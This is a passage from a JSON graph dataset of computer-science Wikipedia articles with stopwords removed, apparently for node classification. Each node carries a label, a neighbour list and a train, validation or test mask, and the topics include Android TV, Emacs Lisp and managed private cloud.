      3804,
      6369,
      9444,
      8940,
      237,
      4845,
      1775,
      4850,
      2804,
      10484,
      8954,
      9988,
      8975,
      4369,
      5397,
      1304,
      4398,
      7983,
      4406,
      823,
      1336,
      8504,
      11076,
      8517,
      9542,
      8522,
      3921,
      2389,
      8037,
      4459,
      5492,
      3976,
      11663,
      1940,
      3488,
      4001,
      950,
      9151,
      451,
      1987,
      965,
      4561,
      8675,
      10727,
      5096,
      6120,
      491,
      11249,
      5106,
      506,
      8692,
      9204,
      6138,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3660,
    "label": 7,
    "text": "Managed_private_cloud:managed private cloud managed private cloud refers principle software architecture single instance software runs server serving single client organization tenant managed third-party third-party provider responsible providing hardware server also preliminary maintenance contrast multitenancy multiple client organizations share single server on-premises deployment client organization hosts software instance managed private clouds also fall larger umbrella cloud computing need private clouds arose due enterprises requiring dedicated service infrastructure cloud computing needs business critical operations improved security better control resources managed private cloud adoption popular choice among organizations rise due enterprises requiring dedicated cloud environment preferring avoid deal management maintenance future upgradation costs associated infrastructure services operational costs unavoidable on-premises private cloud data centers managed private cloud cuts upkeep costs outsourcing infrastructure management maintenance managed cloud provider easier integrate organization ’ existing software services applications dedicated cloud hosting infrastructure customized client ’ needs instead public cloud platform whose hardware infrastructure/software platform individualized client customers choose managed private cloud deployment usually choose desire efficient cloud deployment also need service customization integration available single-tenant environment chart shows key benefits different types deployments shows overlap cloud solutions chart shows key drawbacks since deployments done single-tenant environment usually cost-prohibitive small medium-sized businesses server upkeep maintenance handled service provider including network management security client charged services upto potential client determine managed private cloud solution aligns business objectives budget service-provider maintains upkeep servers network platform infrastructure sensitive data typically stored managed private clouds may leave business-critical information prone breaches via third-party attacks cloud service provider common customizations integrations include software companies taken variety strategies managed private cloud realm software organisations provided managed private cloud options internally microsoft companies offer on-premises deployment option definition enable third-party companies market managed private cloud solutions managed private cloud service providers others popular webconferencing products like cisco webex citrix go-to-meeting skype available via multitenancy available managed private cloud environment",
    "neighbors": [
      448,
      929,
      4194,
      6018,
      3819,
      5371,
      4604
    ],
    "mask": "None"
  },
  {
    "node_id": 3661,
    "label": 1,
    "text": "Bidirectionalization:bidirectionalization computer science bidirectionalization refers process given source-to-view transformation automatically finding mapping original source updated view updated source 589426",
    "neighbors": [
      9634,
      11542
    ],
    "mask": "None"
  },
  {
    "node_id": 3662,
    "label": 6,
    "text": "Allocation_group:allocation group ag allocation group subvolume file system maintains track free blocks file data makes simultaneous file operations possible one write happen ag time multiple operations performed file system happening different ag smp systems multiple cpus write different ags enabling physically concurrent disk operations single file system hard disks one thing time however file systems span hard disks various ways raid stripe volume management etc. used file systems",
    "neighbors": [
      9762,
      10051,
      1801,
      1776,
      2197,
      246,
      2199
    ],
    "mask": "None"
  },
  {
    "node_id": 3663,
    "label": 0,
    "text": "Content_determination:content determination content determination subtask natural language generation involves deciding information communicated generated text closely related task document structuring consider nlg system summarises information sick babies suppose system four pieces information communicate bits information included generated texts three general issues almost always impact content determination task illustrated example perhaps fundamental issue communicative goal text i.e purpose reader example instance doctor wants make decision medical treatment would probably interested heart rate bradycardias parent wanted know child would probably interested fact baby given morphine crying second issue size level detail generated text instance short summary sent doctor 160 character sms text message might mention heart rate bradycarias longer summary printed multipage document might also mention fact baby morphine iv final issue unusual unexpected information example neither doctors parents would place high priority told baby temperature normal expected case regardless content determination important users indeed many cases quality content determination important factor user perspective determining overall quality generated text three basic approaches document structuring schemas content templates statistical approaches explicit reasoning schemas templates explicitly specify content generated text well document structuring information typically constructed manually analysing corpus human-written texts target genre extracting content template texts schemas work well practice domains content somewhat standardised work less well domains content fluid medical example statistical techniques use statistical corpus analysis techniques automatically determine content generated texts work infancy mostly applied contexts communicative goal reader size level detail fixed example generation newswire summaries sporting events explicit reasoning approaches probably attracted attention researchers basic idea use ai reasoning techniques knowledge-based rules planning pattern detection case-based reasoning etc examine information available communicated including unusual/unexpected communicative goal reader characteristics generated text including target size decide optimal content generated text wide range techniques explored consensus effective",
    "neighbors": [
      2440,
      10847,
      7599
    ],
    "mask": "Test"
  },
  {
    "node_id": 3664,
    "label": 2,
    "text": "Android_TV:android tv android tv version android operating system designed digital media players developed google replacement google tv features user interface designed around content discovery voice search surfacing content aggregated various media apps services integration recent google technologies assistant cast knowledge graph platform first unveiled june 2014 nexus player launch device unveiled october platform also adopted smart tv middleware companies sony sharp android tv products also adopted set-top boxes number iptv television providers android tv first announced google i/o june 2014 successor commercially unsuccessful google tv verge characterized line digital media player platforms leveraging google knowledge graph project chromecast compatibility larger emphasis search closer ties android ecosystem including google play store integration android families android wear focusing supporting video games platform support bluetooth gamepads google play games framework attendees received platform development kit adt-1 information reported adt-1 based scrapped nexus tv launch device developed internally google google unveiled first android tv device nexus player developed asus hardware event october 2014 android tv platform adaptation android os set-top boxes integrated software smart tv hardware home screen uses vertically-scrolling row-based interface including content discovery area populated suggested content followed watch rows surface media content installed apps android tv supports voice input commands universal search across multiple services selected devices also support google assistant android tv devices support google cast allowing media queued supported apps devices identical manner chromecast android tv supports software google play store including media apps games although google play apps compatible android tv thus available android tv devices nvidia shield razer forge tv also marketed microconsoles bundled bluetooth wireless gamepad version android tv provided service operators implement android tv device provide subscribers access consume media content operator customize home screen embedded services onto device running android tv google i/o 2014 google announced sharp sony tp vision would release smart tvs android tv integrated 2015 noted support handling tv-specific functions input switching tuning natively integrated android platform sony unveiled range bravia smart tvs running android tv ces 2015 sharp television sets became available june 10 2015 beginning release two models philips announced 80 2015 tvs run android tv first two models released june 2015 google announced television hardware partners january 2016 including arcelik bang olufsen hisense rca tcl corporation vestel several television providers released set-top boxes based android tv including lg uplus u+ tvg woofer u+ tvg 4k uhd french isp free freebox mini 4k bouygues telecom bbox miami dish network released android tv device 2017 known airtv player marketed companion sling tv service supporting optional adapter attaching antenna receive over-the-air television ericsson added android tv support mediafirst iptv platform used basis canadian services telus pik tv sasktel maxtv stream vodafone australia currently selling tv tuner media streaming device running android tv",
    "neighbors": [
      4096,
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      8237,
      3633,
      4147,
      1083,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      1107,
      8280,
      8285,
      2658,
      8821,
      11391,
      1670,
      7816,
      1674,
      5262,
      6800,
      11408,
      10393,
      8858,
      7835,
      673,
      7841,
      1700,
      8870,
      1191,
      1203,
      7359,
      196,
      3269,
      3782,
      8907,
      10445,
      3795,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      6380,
      8940,
      9970,
      7926,
      3836,
      5892,
      7428,
      8455,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      7983,
      3380,
      5431,
      2875,
      3900,
      10045,
      10557,
      11590,
      11592,
      11082,
      332,
      9039,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      7548,
      1409,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      1959,
      937,
      5546,
      3499,
      6057,
      6058,
      7595,
      8122,
      8124,
      4044,
      4048,
      2001,
      479,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3665,
    "label": 9,
    "text": "FAUST_(programming_language):faust programming language faust functional audio stream domain-specific purely functional programming language implementing signal processing algorithms form libraries audio plug-ins standalone applications faust program denotes signal processor mathematical function applied input signal fed faust programming model combines functional programming approach block diagram syntax faust program ’ describe sound group sounds signal processor program source organized set definitions least definition keyword codice_1 equivalent codice_2 c faust compiler translates faust code c++ object may interface c++ code produce full program generated code works sample level therefore suited implement low-level dsp functions like recursive filters code may also embedded self-contained depend dsp library runtime system deterministic behavior constant memory size semantics faust driven simple well-defined allows faust compiler semantically driven instead compiling program literally compiles mathematical function denotes may promote component reuse moreover access exact semantics faust program simplify preservation issues faust textual language block diagram oriented combines two approaches functional programming algebraic block diagrams constructed via function composition faust relies block diagram algebra five composition operations faust programs define codice_1 function operates incoming data analogous codice_2 function programming languages following example produces silence second example copies input signal output involves codice_5 primitive denotes identity function signals another example sums stereo signal mono signal using codice_6 primitive faust primitives analogous c counterpart numbers lifted signals example faust primitive codice_7 operates signal x applying c function codice_7 sample x c numerical functions counterpart faust signal processing primitives specific faust example delay operator codice_9 takes two input signals x signal delayed delay applied produces output signal x − contrary max-like visual programming languages user manual connections faust primitives assembled block diagrams using set high-level block diagram composition operations using sequential composition operator codice_10 output codice_6 routed input codice_12 compute absolute value signal example parallel composition using codice_13 operator arranges left right expressions parallel analogous stereo cable operators arbitrarily combined following code multiplies input signal 0.5 may rewritten curried form recursive composition operator codice_14 used create block diagrams cycles include implicit one-sample delay example integrator takes input signal x computes output signal x t−1 using specific architecture files faust program used produce code variety platforms plug-in formats architecture files act wrappers describe interactions host audio gui system 10 architectures supported new ones may implemented anyone useful option makes possible generate block diagram representation program one svg graphic files useful note difference block diagram generated c++ code stated key idea compile block diagram literally mathematical function denotes modern c/c++ compilers also ’ compile programs literally complex semantics c/c++ due side effects pointer aliasing etc ’ go far direction distinct advantage purely functional language allows compilers advanced optimisations faust semantics almost haskell arrows type class however arrow type class bound signal processors arrow combinators restrictive faust counterparts e.g. nesting parallel composition preserved inputs operands codice_15 must match exactly",
    "neighbors": [
      7172,
      8964,
      9224,
      6797,
      8958,
      7571,
      6933,
      6810,
      1952,
      3876,
      5037,
      7983,
      823,
      9783,
      8262,
      3665,
      3413,
      7769,
      9565,
      7535,
      2804,
      5492,
      9210,
      2045,
      7550
    ],
    "mask": "Test"
  },
  {
    "node_id": 3666,
    "label": 4,
    "text": "E-Stewards:e-stewards e-stewards initiative electronics waste recycling standard created basel action network program organization created grew concern electronic waste generated wealthy countries dismantled poor countries often underage workers young workers exposed toxic metals working unsafe conditions 2009 ban published e-stewards standard responsible recycling reuse electronic equipment set forth requirements becoming certified e-stewards recycler—a program recognizes electronics recyclers adhere stringent environmentally socially responsible practices recovering hazardous electronic materials recyclers qualified older pledge program 1 september 2011 achieve certification standard e-stewards accredited certification body accredited anab ansi-asq national accreditation board e-stewards standard responsible recycling reuse electronic equipment developed basel action network industry-specific environmental management system standard basis e-stewards initiative 6 march 2012 ban released updated revised version 2.0 open public comment prior final adoption later spring 2012 certification available electronics recyclers refurbishers achieve e-stewards certification organizations subject initial stage stage ii audit passing audits accepted ban yearly surveillance audits take place ensure organizations standard registered iso 14001 environmental management system place well achieving numerous performance requirements including assuring export hazardous electronic wastes developing countries use prison labor dumping toxic materials municipal landfills",
    "neighbors": [
      6658,
      1477,
      11534,
      2867,
      403,
      7579
    ],
    "mask": "Test"
  },
  {
    "node_id": 3667,
    "label": 2,
    "text": "OpenPKG:openpkg openpkg open source package management system unix based well known rpm-system allows easy unified installation packages onto common unix-platforms solaris linux freebsd project launched ralf s. engelschall november 2000 june 2005 offered 880 freely available packages",
    "neighbors": [
      8068,
      11525,
      3462,
      8582,
      10760,
      2955,
      7435,
      6797,
      7947,
      9487,
      788,
      1813,
      5397,
      8213,
      6680,
      10900,
      10394,
      8476,
      9245,
      5155,
      5670,
      4775,
      7722,
      6828,
      5677,
      6446,
      1842,
      823,
      2872,
      6583,
      5819,
      10172,
      190,
      9151,
      10817,
      8644,
      9671,
      5578,
      5067,
      3918,
      463,
      4302,
      5070,
      2259,
      6227,
      4309,
      4951,
      6361,
      2010,
      9564,
      8413,
      2401,
      1379,
      7140,
      741,
      231,
      5096,
      2281,
      6119,
      8554,
      5612,
      9063,
      9324,
      10096,
      1138,
      1522,
      5492,
      3573,
      2168,
      6393,
      7293
    ],
    "mask": "Test"
  },
  {
    "node_id": 3668,
    "label": 0,
    "text": "Martin_Kay:martin kay martin kay computer scientist born 1935 known especially work computational linguistics born raised united kingdom received m.a trinity college cambridge 1961 1958 started work cambridge language research unit one earliest centres research known computational linguistics 1961 moved rand corporation santa monica california us eventually became head research linguistics machine translation left rand 1972 become chair department computer science university california irvine 1974 moved xerox palo alto research center research fellow 1985 retaining position xerox parc joined faculty stanford university half-time currently professor linguistics stanford university honorary professor computational linguistics saarland university born edgeware middlesex great britain 1935 studied linguistics computational linguistics trinity college cambridge main interests translation people machines computational linguistic algorithms especially fields morphology syntax kay began career cambridge language research unit cambridge england margaret masterman 1961 david g. hays hired work rand corporation subsequently worked university california irvine xerox parc kay one pioneers computational linguistics machine translation responsible introducing notion chart parsing computational linguistics notion unification linguistics generally ron kaplan pioneered research application development finite-state morphology longtime contributor critic work machine translation seminal paper proper place men machines language translation kay argued mt systems tightly integrated human translation process reviewer critic eurotra verbmobil many mt projects kay former chair association computational linguistics president international committee computational linguistics research fellow xerox parc 2002 holds honorary doctorate gothenburg university kay received lifetime achievement award association computational linguistics sustained role intellectual leader nlp research 2005 1 martin kay proper paper 1 alpac report 1966 conclusion made immediate predictable prospect useful mt producing useful translation general scientific texts 2 result field machine translation entered dark period 1966 1976 almost ten years researches done however 1980s renaissance period coming 3 proper place men machines language translation attracted attention machine translation paper new thoughts achieved relationship machine translation human translation time application cheaper computers broad usage domains machine translation high quality outputs badly needed theory fully automatic high quality translation ideal level machine translation criticisms bar-hillel 1960s review mt progress goal mt fully automatic high quality translation fahqt replace human translators instead mt adopt less ambitious goals e.g cost-effective human-machine interaction aim enhancement human translation productivity 4 useful human translation promoted new higher level according thought martin kay proposed practical idea relationship human machine process machine translation called translator amanuensis 1.1 two arguments useful machine translation idea includes human machine time computer scientists linguists responsibilities mt never asked provide engineering solution problem dimly understand need achieve done absolute surety reliability …can virtually guaranteed concerned main parts translation two related arguments plausibility machine translation industrial enterprise point view linguistics computer science two arguments commonly made ad hoc solutions problems machine translation former argument ad hoc solutions tend based case-by-case analyses linguists call surface phenomena essentially strings words real imagined statistical properties particular styles writing domains discourse simple statistical claim dismissed second argument ad hoc solutions alluded understanding second language reading text called sorcerer apprentice kind argument effect kind incomplete theory linguists computer scientists able provide often worse base build practical devices theory theory know stop main problem sorcerer's-apprentice argument decision sentence could translated without analysis made fact example sentence shows one interpretation sentence level analysis shows single translation compatible short algorithm required decide analysis required would use results analysis designed avoid 1.2 translator amanuensis translation memory main part paper illustrate translator amanuensis author showed three aspects text editing translation aids machine translation suppose translators provided terminal consisting keyboard screen way pointing individual words letters display screen divided two windows text translated appears upper window translation composed bottom one form translator amanuensis real device never windows behave way using pointing device translator select letter word sentence line paragraph pressing appropriate key cause operation visited upon two figures show translation process initial display selection device simple two figures special service made translator translation aids author showed third figure relatively trivial addition would dictionary translator selects word sequence words gives command cause looked up…this new window gives effect overlaying portion windows already present case new window contains deceptively simple dictionary entry selected word device many features example simplicity dictionary entry words syntax semantics included pointing symbols modifiable dictionary entries temporary amendments make device practical machine translation explained one options offered user hypothetical system describing fairly early stage command direct program translate currently selected unit happen command given different different stages system development user system always empowered intervene translation process extent specifies elects intervene piece text purporting translate current unit displayed lower window screen able edit way likes post-editors done past alternatively may ask consulted whenever program confronted decision specified type certain kinds ambiguities detected whatever occasions system put question human translator may example ask consulted questions pronominal reference part idea translation memory shown dictionary operation suppose example word put local store – part dictionary persists long document worked – occurs text significantly frequently statistics stored main dictionary indicate phrase noted occurs two three times recognized idiom set phrase dictionary examining contents store embarking translation user may hope get preview difficulties ahead make decisions advance treat decisions course recorded store course indeed reason whatever translator call display units text contain certain word phrase string characters whatever important reference translating text text piece text translated next anything entirely straightforward translator might start issuing command causing system display anything store might relevant bring attention decisions made actual translation started statistically significant words phrases record anything attracted attention occurred going examine past future fragments text contain similar material 1.3 expectation better performance translator amanuensis end paper kay mentioned reasons expect better performance device first system position draw human collaborator attention matters likely need second decisions made course translating passage rarely independent third one important facilities system one keeps track words phrases used special way current text",
    "neighbors": [
      1890,
      9379,
      7724,
      4942,
      2831,
      2326,
      10456,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 3669,
    "label": 2,
    "text": "Execute_Channel_Program_in_Real_Storage:execute channel program real storage ibm mainframe operating systems execute channel program real storage excpvr supervisor call low-level device access programmer responsible providing list device-specific ccws channel program executed i/o channels control units devices additionally programmer expected required ensure input/output data areas real storage fixed either prior invoking excpvr via page fix appendage excpvr situations provide improved performance compared excp excpvr may viewed historically v=r i.e. virtual=real version excp however excpvr restricted v=r applications indeed excpvr may refer non-v=r data areas provided data areas fixed channel command words reference data areas translated virtual real addresses programmer using lra load real address privileged instruction data channels deal real addresses virtual addresses excpvr first introduced svs continued mvs/370 later instances os support added format 1 ccws hence access data areas line format 0 ccws may access data areas line excpvr front-end always tcb mode excpvr type 1 svc mvs/370 subsequent instances os excpvr invokes startio schedule execution channel program hence excpvr back-end always srb mode back-end contains emulation code allows appendages developed earlier pre-mvs instances os function largely thereby appear tcb mode appendages originally designed distinction complicate conversion certain roll-your-own access methods applications mvs",
    "neighbors": [
      8290,
      868,
      7272,
      8393,
      4586,
      11656,
      10094,
      7983,
      7312,
      8911,
      10415,
      10072,
      10958,
      6647,
      2616,
      11131,
      7836,
      2813
    ],
    "mask": "Test"
  },
  {
    "node_id": 3670,
    "label": 2,
    "text": "Screen_Sharing:screen sharing screen sharing vnc client apple inc. included part mac os x v10.5 allows remote observance control macintosh machine local network screen sharing activated may also used internet via ichat screen sharing vnc client may also used control computer running vnc server ip address target computer known accessible apple back mac feature mobileme service offers wide-area bonjour allow screen sharing file sharing access beyond lan",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      576,
      9802,
      5713,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      5784,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      3879,
      811,
      3371,
      7983,
      10036,
      9529,
      4933,
      9035,
      1878,
      4457,
      4490,
      9100,
      9109,
      1439,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "Test"
  },
  {
    "node_id": 3671,
    "label": 4,
    "text": "ARX_(Algorithmic_Research_Ltd.):arx algorithmic research ltd. arx algorithmic research ltd. digital security company headquartered san francisco ca offices uk netherlands australia israel creator cosign arx digital signature technology along related digital signature security technology products arx acquired docusign may 2015 acquisition builds three-year business partnership docusign arx bringing together arx cosign digital signature technology docusign digital transaction management dtm platform broadens docusign global trust network arx digital signature products based public key infrastructure pki technology digital signatures resulting cryptographic operation creates ‘ fingerprint ’ unique signer content copied forged tampered process provides proof signer identity data integrity non-repudiation signed documents verified without need proprietary verification software company cosign solution integrates large range document management workflow automation systems intended streamline workflow processes requiring signatures arx partners document management workflow solution providers including sharepoint opentext oracle alfresco nintex k2 industries focus include life science particularly research clinical trials engineering legal federal/local governments arx clients based north america africa europe asia-pacific italy cosign used ministry defence rai senate court accounts state police bank italy also used european court human rights digitize streamline application process arx solutions validated security standards nist fips 140-2 level 3 fips 186 etsi ts 101 733 2013 cosign named “ strongest digital signature solution ” 2013 report august 2014 cosign received common criteria eal4+ certification thus becoming first remote server-side digital signature solution fully compliant eu newly enacted electronic identification trust services regulation electronic transactions internal market eidas arx solutions also comply esign ueta fda 21 cfr part 11 sox hipaa usda among many signature-related country- industry-specific laws regulations arx founded 1987 prof. amos fiat yossi tulpan focused developing encryption-based products included rsa-smartcard developed canal+ 1989 secure-pin entry keyboard connected smartcard reader cryptographic toolkits network-attached cryptographic server hsm vpn september 1997 arx acquired cylink corp nasdaq cylk sunnyvale california 2001 company went management buy-out mbo initiated dr. gadi aharoni dr. aharoni served president ceo arx 14 years leadership company gradually switched focus newly developed cosign digital-signature solution may 2015 arx acquired u.s. competitor docusign",
    "neighbors": [
      7075,
      420,
      8904,
      10831,
      10962
    ],
    "mask": "Test"
  },
  {
    "node_id": 3672,
    "label": 2,
    "text": "Files_(Apple):files apple files file management app developed apple inc. devices run ios 11 later releases ios discovered placeholder title app store prior company 2017 worldwide developers conference app officially announced conference shortly thereafter files allows users browse local files stored within apps well files stored cloud storage services including icloud dropbox google drive onedrive allows saving opening organization files including placement structured folders sub-folders ipads able drag-and-drop files files apps iphone users limited drag-and-drop inside files organization done use color-coded custom-named tags persistent search bar allows finding files inside folders though inside apps list view enables different sorting options app offers exclusive playback high-quality flac audio files also offers support viewing text files images music memos zip archives well limited support video hours apple 2017 worldwide developers conference developer steve troughton-smith discovered placeholder title app store files app requiring ios 11 apple officially announced app conference shortly thereafter files allows users browse local files stored within apps well files stored cloud storage services including icloud box dropbox google drive onedrive users able save open organize files including placing files structured folders sub-folders ipad users drag-and-drop files files app apps iphone functionality limited inside respective app users add colored custom-named tags files adding dedicated tags section persistent search bar top enables finding files inside sub-folders though n't search within apps list view enables optional sorting according size date upon long-pressing file app offers several options including copy rename move share tags info delete files stored third-party services copied device offline access icloud sharing brought apple dedicated iwork apps become standardized feature across operating system enabling sharing file files dedicated icloud drive app removed replaced files icloud available one cloud storage providers users connect app to.. built-in player inside files app allows playback high-quality flac audio files app also supports viewing zip archives though extraction opportunities available compatible app installed files allows viewing text files experiments watching videos avi mov formats shown limited partially successful results images music memo files also previewed played",
    "neighbors": [
      10755,
      9732,
      4623,
      5647,
      7697,
      11289,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      8783,
      4180,
      10838,
      1623,
      3681,
      9826,
      8806,
      3691,
      2673,
      7292,
      2686,
      6783,
      10878,
      5784,
      1177,
      3228,
      2207,
      11430,
      2735,
      3248,
      4283,
      3772,
      7869,
      3286,
      9430,
      3293,
      4318,
      6884,
      9451,
      1772,
      7420,
      1290,
      3338,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7983,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      7496,
      4957,
      6495,
      9063,
      3948,
      10608,
      2439,
      6023,
      6539,
      7052,
      3483,
      2979,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      8662,
      9174,
      7133,
      9182,
      4068,
      487,
      488,
      2023,
      7154
    ],
    "mask": "None"
  },
  {
    "node_id": 3673,
    "label": 4,
    "text": "IronPort:ironport ironport systems inc. headquartered san bruno california company designed sold products services protect enterprises internet threats ironport founded december 2000 scott banister scott weiss best known ironport antispam senderbase email reputation service email security appliances appliances ran modified freebsd kernel trademark asyncos november 24 2003 ironport acquired spamcop filtering reporting service ran stand-alone entity cisco systems announced january 4 2007 would buy ironport deal valued us 830 million completed acquisition june 25 2007 ironport integrated cisco security business unit senderbase renamed sensorbase take account input database cisco devices provide sensorbase allows devices build risk profile ip addresses therefore allowing risk profiles dynamically created http sites smtp email sources",
    "neighbors": [
      1088,
      7552,
      11104,
      1667,
      998,
      6834,
      9909,
      4797,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 3674,
    "label": 2,
    "text": "Ricardo_Galli:ricardo galli dr. ricardo adolfo galli granada also known gallir doctor computer science university balearic islands teaches operating system design speaker free software foundation free software activist university project created system allows controlling airship parking son sant joan airport palma de mallorca balearic islands spain december 2005 programmed menéame clone well-known digg web site serves promote stories published blogs released source code meneame source code open source digg clone pligg cms based programmed cpudyn daemon used underclock portable computers reduce power consumption programmed wp-cache wordpress plugin purpose caching pages make one blog faster responsive 2001 nominated hispalinux prize published 200 technical articles bulma catalan linux user web site",
    "neighbors": [
      2050,
      1028,
      2180,
      4230,
      11654,
      9865,
      4493,
      1939,
      2332,
      10012,
      3744,
      802,
      3618,
      4265,
      11180,
      7983,
      6962,
      5555,
      2233,
      9148,
      10687,
      8258,
      10822,
      5703,
      5833,
      4561,
      8147,
      1112,
      2010,
      7904,
      8673,
      9696,
      10464,
      3817,
      9579,
      1007,
      8304,
      1394,
      8436,
      3068,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 3675,
    "label": 9,
    "text": "Emacs_Lisp:emacs lisp emacs lisp dialect lisp programming language used scripting language emacs text editor family commonly associated gnu emacs xemacs used implementing editing functionality built emacs remainder written c lisp interpreter emacs lisp also termed elisp although also older unrelated lisp dialect name users emacs commonly write emacs lisp code customize extend emacs options include customize feature gnu emacs since version 20 written emacs lisp customize provides set preferences pages allowing user set options preview effect running emacs session user saves changes customize simply writes necessary emacs lisp code user config file set special file customize uses avoid possibility altering user file emacs lisp also function scripting language much like unix bourne shell perl calling emacs batch mode way may called command line via executable file editing functions buffers movement commands available program normal mode user interface presented emacs started batch mode simply executes passed-in script exits displaying output script emacs lisp closely related maclisp later influence common lisp supports imperative functional programming methods richard stallman chose lisp extension language rewrite emacs original used text editor corrector teco extension language powerful features including ability treat functions data although common lisp standard yet formulated scheme existed time stallman rewriting gosling emacs gnu emacs chose use comparatively poor performance workstations opposed minicomputers emacs traditional home wanted develop dialect thought would easily optimized lisp dialect used emacs differs substantially modern common lisp scheme dialects used applications programming prominent characteristic emacs lisp use dynamic rather lexical scope default see function may reference local variables scope called scope defined understand logic behind emacs lisp important remember emphasis providing data structures features specific making versatile text editor implementing general-purpose programming language example emacs lisp easily read file line time—the entire file must read emacs buffer however emacs lisp provides many features navigating modifying buffer text sentence paragraph higher syntactic level defined modes follows simple example emacs extension written emacs lisp emacs editing area split separate areas called windows displaying different buffer buffer region text loaded emacs memory possibly file saved text document users press default c-x 2 key binding open new window runs emacs lisp function codice_1 normally new window appears displays buffer previous one suppose wish make display next available buffer order user writes following emacs lisp code either existing emacs lisp source file empty emacs buffer first statement codice_2 defines new function codice_3 calls codice_1 old window-splitting function tells new window display another new buffer second statement codice_5 re-binds key sequence c-x 2 new function also written using feature called advice allows user create wrappers around existing functions instead defining advantage requiring keybindings changed working wherever original function called well simpler write disadvantage making debugging complicated reason advice allowed source code gnu emacs user wishes advice feature used code reimplement code follows instructs codice_1 execute user-supplied code whenever called executing rest function advice also specified execute original function around it—literally wrapping original conditionally execute original function based results advice emacs 24.4 replaces codice_7 mechanism codice_8 claimed flexible simpler advice could reimplemented using new system changes take effect soon code evaluated necessary recompile restart emacs even rehash configuration file code saved emacs init file emacs load extension next time starts otherwise changes must reevaluated manually emacs restarted emacs lisp code stored filesystems plain text files convention filename suffix .el user init file exception often appearing .emacs despite evaluated emacs lisp code recent versions emacs recent 40-year-old program meaning roughly version released since mid-1990s also load ~/.emacs.el ~/.emacs.d/init.el additionally users may specify file load config file command line explicitly state config file loaded files loaded interpreter component emacs program reads parses functions variables storing memory available editing functions user commands functions variables freely modified redefined without restarting editor reloading config file order save time memory space much functionality emacs loads required set optional features shipped emacs implemented collection emacs code called package library example library highlighting keywords program source code library playing game tetris library implemented using one emacs lisp source files libraries define one major modes activate control function emacs developers write certain functions c. primitives also termed built-in functions subrs although primitives called lisp code modified editing c source files recompiling gnu emacs primitives available external libraries part emacs executable xemacs runtime loading primitives possible using operating system support dynamic linking functions may written primitives need access external data libraries otherwise available emacs lisp called often enough comparative speed c versus emacs lisp makes worthwhile difference however errors c code easily lead segmentation violations subtle bugs crash editor writing c code interacts correctly emacs lisp garbage collector error-prone number functions implemented primitives kept necessary minimum byte-compiling make emacs lisp code execute faster emacs contains compiler translate emacs lisp source files special representation termed bytecode emacs lisp bytecode files filename suffix .elc compared source files bytecode files load faster occupy less space disk use less memory loaded run faster bytecode still runs slowly primitives functions loaded bytecode easily modified re-loaded addition bytecode files platform-independent standard emacs lisp code distributed emacs loaded bytecode although matching source files usually provided user reference well user-supplied extensions typically byte-compiled neither large computationally intensive notably cl package implements fairly large subset common lisp emacs lisp unlike lisp implementations tail-call optimization without tail recursions eventually lead stack overflow apel library aids writing portable emacs lisp code help polysylabi platform bridge emacs lisp lisp-2 meaning function namespace separate namespace uses variables like maclisp emacs lisp uses dynamic scope offering static lexical option starting version 24 activated setting file local variable codice_9 dynamic scoping programmer declares variable within scope function available subroutines called within function originally intended optimization lexical scoping still uncommon uncertain performance asked rms implementing emacs lisp dynamically scoped exact reply lexical scope inefficient dynamic scoping also meant provide greater flexibility user customizations however dynamic scoping several disadvantages firstly easily lead bugs large programs due unintended interactions variables different functions secondly accessing variables dynamic scoping generally slower lexical scoping also codice_10 macro cl package provide effective lexical scope emacs lisp programmers cl widely used codice_10 rarely used",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      564,
      9780,
      2102,
      2105,
      3132,
      6717,
      5694,
      8258,
      8771,
      8778,
      1613,
      9299,
      10841,
      10333,
      7267,
      2660,
      8293,
      10855,
      2666,
      2166,
      5751,
      7805,
      9345,
      5251,
      1159,
      9865,
      9877,
      5803,
      2225,
      6840,
      7867,
      4799,
      9926,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      2804,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      10510,
      1301,
      791,
      10012,
      3869,
      2335,
      2849,
      8993,
      7981,
      7983,
      2352,
      10547,
      823,
      311,
      6969,
      7500,
      3408,
      6994,
      1365,
      9557,
      2392,
      10083,
      6502,
      11625,
      5492,
      3446,
      10104,
      377,
      4992,
      8582,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      1962,
      5546,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      8173,
      9714,
      7670,
      11255,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3676,
    "label": 6,
